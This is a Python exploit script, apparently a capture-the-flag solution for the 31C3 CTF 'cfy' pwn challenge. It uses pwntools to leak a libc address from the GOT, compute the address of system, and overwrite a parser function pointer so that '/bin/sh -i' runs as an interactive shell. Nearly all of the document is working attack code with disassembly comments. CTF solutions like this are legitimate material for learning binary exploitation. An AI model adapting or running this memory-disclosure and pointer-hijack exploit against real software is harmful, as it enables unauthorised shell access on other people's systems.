exploit.py

#!/usr/bin/env python2

# 31C3 CTF : cfy
# https://github.com/ctfs/write-ups-2014/tree/master/31c3-ctf-2014/pwn/cfy

from pwn import *

# 0x00400891      488b05300820.  mov rax, qword [obj.stdin]
# 0x00400898      4889c2         mov rdx, rax
# 0x0040089b      be00040000     mov esi, 0x400
# 0x004008a0      bfe0106000     mov edi, obj.buf
# 0x004008a5      e856fdffff     call sym.imp.fgets
# 0x004008aa      8b45f4         mov eax, dword [rbp - num]
# 0x004008ad      4898           cdqe
# 0x004008af      48c1e004       shl rax, 4
# 0x004008b3      480580106000   add rax, obj.parsers
# 0x004008b9      488b00         mov rax, qword [rax]
# 0x004008bc      bfe0106000     mov edi, obj.buf
# 0x004008c1      ffd0           call rax

# [0x0040080c]> f~buf
# 0x006010e0 1024 obj.buf
# [0x0040080c]> f~parsers
# 0x00601080 48 obj.parsers
addr_buf     = 0x006010e0
addr_parsers = 0x00601080

# [0x0040080c]> f~reloc.puts
# 0x00601018 8 reloc.puts_24
addr_puts_got = 0x00601018

# $ nm /usr/lib/libc-2.24.so | grep -E '\b(puts|system)\b'
# 0000000000068fe0 W puts
# 000000000003f4d0 W system
offset_libc_puts   = 0x68fe0
offset_libc_system = 0x3f4d0

r = process('./cfy')

# What do you want to do?
# 0) parse from hex
# 1) parse from dec
# 2) parse from pointer
# 3) quit

def choose_action(n):
    r.recvuntil('3) quit\n')
    r.sendline(str(n))

def parse_from_pointer(ptr):
    choose_action(2)
    r.recvuntil('Please enter your number: ')
    r.sendline(p64(ptr))
    r.recvuntil('hex: ')
    return int(r.recvline()[:-1], 16)

addr_libc_puts   = parse_from_pointer(addr_puts_got)
addr_libc_base   = addr_libc_puts - offset_libc_puts
addr_libc_system = addr_libc_base + offset_libc_system
log.success('leaked addr_libc_system: 0x%x' % addr_libc_system)

choose_action((addr_buf + 0x10 - addr_parsers) >> 4)
r.recvuntil('Please enter your number: ')
payload = ''
payload += '/bin/sh -i'.ljust(0x10, '\x00')
payload += p64(addr_libc_system)
r.sendline(payload)

r.interactive()